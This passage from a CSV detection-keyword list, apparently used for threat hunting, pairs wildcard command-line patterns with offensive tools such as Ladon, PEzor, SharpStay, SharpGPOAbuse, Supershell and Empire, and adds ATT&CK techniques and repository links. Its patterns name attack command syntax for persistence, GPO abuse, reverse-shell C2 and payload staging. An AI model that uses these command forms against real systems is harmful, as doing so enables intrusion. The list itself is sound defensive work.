T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* 4444 shell","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* '46993522-7D77-4B59-9B77-F82082DE9D81' *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"* -64 -format=bof *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -64 -format=dll *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -64 -format=service-dll *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -a 1 -f *.dll -p http*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* -a bruteforce *","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"* -a nightmare*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"* -a spoolsample*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"* -a -t titleFixed='Supershell - Inject' -t disableLeaveAlert=true -t disableReconnect=true ssh -J rssh:*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"* -a -t titleFixed='Supershell - Shell' -t disableLeaveAlert=true ssh -J rssh:*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"* aad3b435b51404eeaad3b435b51404ee*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* acarsd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -accepteula -nobanner -d cmd.exe /c *","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Exploitation Tools","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"* --access-token*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* acltoolkit*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"* --action exports --dll C:\Windows\System32\amsi.dll*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"* action=BackdoorLNK *","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=CreateService servicename=* command=*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=ElevatedRegistryKey keyname=Debug keypath*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=ElevatedUserInitKey command=*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=JunctionFolder dllpath=*.dll guid=*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=NewLNK filepath=*"" lnkname=*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=ScheduledTask taskname=* command=*runasuser*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=ScheduledTaskAction taskname=* command=*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=SchTaskCOMHijack clsid=*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=UserRegistryKey keyname=Debug keypath=HKCU:*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=WMIEventSub command=* eventname=*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* --adcs --old-bloodhound *","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"* --AddComputerTask --TaskName * --Author * --Command * --Arguments * --GPOName *","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" +"* --AddLocalAdmin --UserAccount * --GPOName *","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" +"* address-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --AddUserRights --UserRights * --UserAccount * --GPOName *","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" +"* --AddUserScript --ScriptName * --ScriptContents * --GPOName *","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" +"* --adfs-host * --krb-key * --krb-ticket *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"* ADFSpoof.py*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" +"* adhunt.py *","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"* adm2sys.py*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","0","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" +"* admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* afp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* afp-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* afp-path-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* afp-serverinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* afp-showmount.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -AgentDelay *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -AgentJitter *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* ajp-auth.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ajp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ajp-headers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ajp-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ajp-request.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* Alcatraz.exe*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"* All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* allseeingeye-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* amqp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation 